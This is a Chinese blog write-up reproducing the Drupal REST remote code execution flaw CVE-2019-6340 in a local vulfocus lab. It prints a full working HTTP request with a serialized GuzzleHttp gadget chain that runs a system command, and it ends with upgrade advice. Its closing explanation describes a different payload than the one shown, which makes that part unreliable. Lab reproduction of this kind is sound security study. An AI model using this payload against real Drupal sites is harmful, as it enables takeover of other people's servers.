Drupal 远程代码执行 CVE-2019-6340 已亲自复现

最新推荐文章于 2024-04-10 13:24:45 发布
最新推荐文章于 2024-04-10 13:24:45 发布
阅读量848 收藏 10
点赞数 8
分类专栏: drupal漏洞合集 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42430287/article/details/135155186
版权

Drupal 远程代码执行 CVE-2019-6340 已亲自复现

漏洞名称

漏洞描述

Drupal是一个开源且以PHP语言写成的内容管理框架(CMF) 研究人员发现Drupal存在安全漏洞(CVE-2019-6340),当攻击者以PATCH或POST方式传送RESTful Web资料时,Drupal并未对资料进行严格的检查,进而导致执行任意PHP程式码。

影响版本

Drupal 8.6.x
Drupal <8.6.10
Drupal <8.5.11

漏洞复现

环境搭建

受害者IP:192.168.63.129:57473
攻击者IP:192.168.63.1

vulfocus下载链接

https://github.com/fofapro/vulfocus
git clone https://github.com/fofapro/vulfocus.git

启动vulfocus

docker-compose up -d

环境启动后,访问http://192.168.63.129:57473即可看到一个 Drupal页面,说明已成功启动。

在这里插入图片描述

替换payload,执行命令id。

POST /node/?_format=hal_json HTTP/1.1
Host: 漏洞的ip:端口
User-Agent:  Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Connection:  keep-alive
Content-Type: application/hal+json
Accept:  */*
Cache-Control: no-cache
Content-Length: 636
 
{
  "link": [
    {
      "value": "link",
      "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}"
    }
  ],
  "_links": {
    "type": {
      "href": "http://漏洞的ip:端口/rest/type/shortcut/default"
    }
  }
}

在这里插入图片描述

更换payload,需要更换两个位置。

在这里插入图片描述

在黄色的后面是执行命令的结果

在这里插入图片描述

修复建议

1、
Drupal 多个安全漏洞的补丁-升级至最新版本9.4.8
https://www.drupal.org/project/drupal/releases/9.4.8

总结

在请求体中使用了GuzzleHttp库的FnStream类和HandlerStack类,这两个类在正常情况下是用于处理HTTP请求的,但在这里被恶意利用来执行攻击者的代码。攻击者在HandlerStack类的handler属性中插入了pbtw%%rxtx,试图输出pbtw%rxtx字符串。如果攻击成功,则响应状态码为403,响应头中将出现pbtw%rxtx字样。

Bolgzhang
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
(CVE-2019-6340)Drupal 远程代码执行漏洞
m0_55563900的博客
04-17 572
漏洞概念 Drupal官方之前更新了一个非常关键的安全补丁,修复了因为接受的反序列化数据过滤不够严格,在开启REST的Web服务拓展模块的情况下,可能导致PHP代码执行的严重安全。 根据官方公告和自身实践,8.6.x或(<8.6.10)两种情况可能导致问题出现: RESTful Web Services拓展开启,并且启用了REST资源(默认配置即可),不需要区分GET,POST等方法即可完成攻击。 JSON:API服务模块开启,此服务尚未分析。 2.影响版本 Drupal < 8.6.10Dru
Drupal远程代码执行漏洞(CVE-2019-6340
锋刃科技的博客
06-24 1607
前言 Drupal官方之前更新了一个非常关键的安全补丁,修复了因为接受的反序列化数据过滤不够严格,在开启REST的Web服务拓展模块的情况下,可能导致PHP代码执行的严重安全。 根据官方公告和自身实践,8.6.x或(<8.6.10)两种情况可能导致问题出现: RESTful Web Services拓展开启,并且启用了REST资源(默认配置即可),不需要区分GET,POST等方法即可完成攻击。 JSON:API服务模块开启,此服务尚未分析。 影响版本 Drupal < 8.6.1.
Drupal远程代码执行漏(CVE-2019-6340
qq_59975439的博客
06-10 1623
Drupal远程代码执行漏(CVE-2019-6340
【漏洞分析】Drupal 远程代码执行CVE-2017-6920)
蚁景网安学院
07-13 631
前几天在参加 FOFA-攻防挑战赛时,遇到了 Drupal 的盲盒漏洞环境,最终确定漏洞为 CVE-2017-6920 ,但是还是无法 getflag ,因为网上相关参考文章并不是很多,大多都只是简单的复现了,于是就想着对这个漏洞进行一个详细的分析......
CVE-2019-6340Drupal 8.x REST RCE 远程执行代码漏洞复现
Blog of Jaoing
04-21 2791
Drupal 是由德赖斯·布伊泰尔特创立的自由开源内容管理系统,用PHP语言写成。在业界,Drupal常被视为内容管理框架(CMF),而非一般意义上的内容管理系统(CMS)。 2019-02-20,Drupal 安全团队披露了一个安全漏洞(CVE-2019-6340),如果网站开启了......
Drupal 修复远程代码执行漏洞
smellycat000的专栏
11-20 242
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队周三,Drupal 内容管理系统 (CMS) 发布更新,修复了和不正确清理所上传文件名称有关的一个远程代码执行漏洞 (CVE...
Drupal 远程代码执行漏洞(CVE-2018-7602)
07-19 3100
漏洞复现:1.如下图所示,执行以下命令即可复现该漏洞。示例命令为 id,如图红框中显示,可以执行该命令。 "id"为要执行的命令 第一个drupal为用户名 第二个drupal为密码 python3 drupa7-CVE-2018-7602.py -c "id" drupal drupal http://ip:8081/2.得有CVE-2018-7600的PoC。 #!/usr/bin/en...
Drupal远程代码执行漏洞(CVE-2019-6339)
weixin_46411728的博客
08-25 2608
Drupal 远程代码执行漏洞(CVE-2019-6339)
Drupal远程代码执行(CVE-2019-6339)——Dcoker复现
Zlirving_的博客
06-20 524
该漏洞概述 漏洞简介 Drupal core是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞。 影响版本 Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本 危害 远程攻击者可利用该漏洞执行任意的php代码。   漏洞复现
Drupal远程代码执行漏洞(CVE-2018-7600)
ANOrange的博客
04-10 785
DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。
Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340)
07-10
使用docker-compose命令一步搭建Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340) 的漏洞环境
Drupal RCE(CVE-2019-6340复现踩坑
痴人说梦梦中人
10-14 1683
CVE-2019-6340 影响范围:Drupal < 8.6.10,Drupal < 8.5.12 1、搜索镜像 docker search cve-2019-6340 2、拉取 docker pull knqyf263/cve-2019-6340 3、运行 docker run -d -t -p 80:80 knqyf263/cve-2019-6340 4、访问url:http://174.99.8.203/node/1 5、抓取数据包并修改 注意三点: A、POST /node/?_f
「漏洞分析」Drupal 远程代码执行CVE-2017-6920」
蚁景网安学院
07-13 303
前几天在参加 FOFA-攻防挑战赛时,遇到了 Drupal 的盲盒漏洞环境,最终确定漏洞为 CVE-2017-6920 ,但是还是无法 getflag ,因为网上相关参考文章并不是很多,大多都只是简单的复现了,于是就想着对这个漏洞进行一个详细的分析。漏洞描述环境搭建环境的搭建,我们可以选择 p神 的 Vulhub 上的环境,我们也可以利用 vulfocus 的在线环境,或...
CVE-2019-6340 Drupal REST RCE漏洞复现
Y5neKO's blog
04-13 507
本次作为记录,使用环境为大佬搭建的0x01 漏洞描述Drupal 是使用 PHP 语言编写的开源内容管理框架,Drupal 综合了强大并可自由配置的功能,能支持各种不同应用的网站项目。其 Drupal 社区是全球大的开源社区之一, 在社区的维护下,Drupal代码在安全性、健壮性上具有世界较高水平。2019/02/20,Drupal 安全团队披露了一个安全漏洞(C...
vulfocus——drupal1代码执行(CVE-2018-7600)
m0_62063669的博客
09-07 954
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。函数会把第一个参数作为回调函数,之后的参数作为回调函数的参数。有特殊的处理,攻击者可利用Drupal表单渲染的问题执行恶意代码,达到完全控制。时就会提示可能导致代码执行Drupal的问题稍显常规,来自。是用户可控的,这就导致了。
Drupal远程命令执行漏洞复现
BerL1n
12-29 771
time: 2019-05-12 21:46 漏洞描述 Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。 漏洞检测 针对该漏洞,可采用两种方法进行检测: 方法一:登陆Drupal管理后台,查看内核版本是8.x,且版本号低于8.3.4,则存在该漏洞;否则,不存在该漏洞; 方法二:在Drupal根目录下找到文件/core/lib/Drupal/Com
cve-2019-6340 drupal8 rest rce 漏洞复现
whatday的专栏
07-20 2968
目录 0X1 漏洞概述 0X2 环境搭建 0X3 漏洞利用 0X4漏洞分析 0X1 漏洞概述 Drupal官方之前更新了一个非常关键的安全补丁,修复了因为接受的反序列化数据过滤不够严格,在开启REST的Web服务拓展模块的情况下,可能导致PHP代码执行的严重安全。 根据官方公告和自身实践,8.6.x或(<8.6.10)两种情况可能导致问题出现: RESTful Web Services拓展开启,并且启用了REST资源(默认配置即可),不需要区分GET,POST等方法即可完成攻击。 .
Drupal 8.x 远程执行代码漏洞复现记录
aliexiansheng的博客
08-20 1042
Drupal 8.x 远程执行代码漏洞复现记录 目录 漏洞概述 漏洞影响版本 漏洞环境搭建 漏洞评级 漏洞修复意见 1.漏洞概述 Drupal官方发布安全通告称修复了一个高危的远程代码执行漏洞(CVE-2019-6340)。该漏洞源于某些字段在通过非表格(non-form resources)类型输入时未能正确过滤,导致潜在的任意PHP代码执行 2.影响版本 Drupal 8.6.x < 8.6.10 Drupal 8.5.x(或更早版本) < 8.5.11 3.环境搭建 1.使用doc
PHP代码审计之反序列化攻击链CVE-2019-6340漏洞研究
shelter1234567的博客
12-24 1561
简简单单介绍下php的反序列化漏洞。
drupal-cve2019-6340
最新发布
05-25
Drupal-cve2019-6340Drupal内容管理系统(CMS)的一个安全漏洞。它被标记为“严重”的漏洞,可以允许攻击者执行任意代码,从而完全控制受影响的Drupal网站。 该漏洞存在于Drupal 8.6.x版本和8.5.x版本中,如果未正确配置,攻击者可以通过发送特定的请求利用该漏洞。攻击者可以通过该漏洞远程执行代码,并访问受影响网站上的敏感信息。 Drupal团队已经发布了针对该漏洞的补丁程序,建议Drupal用户尽快升级到最新版本以避免受到攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值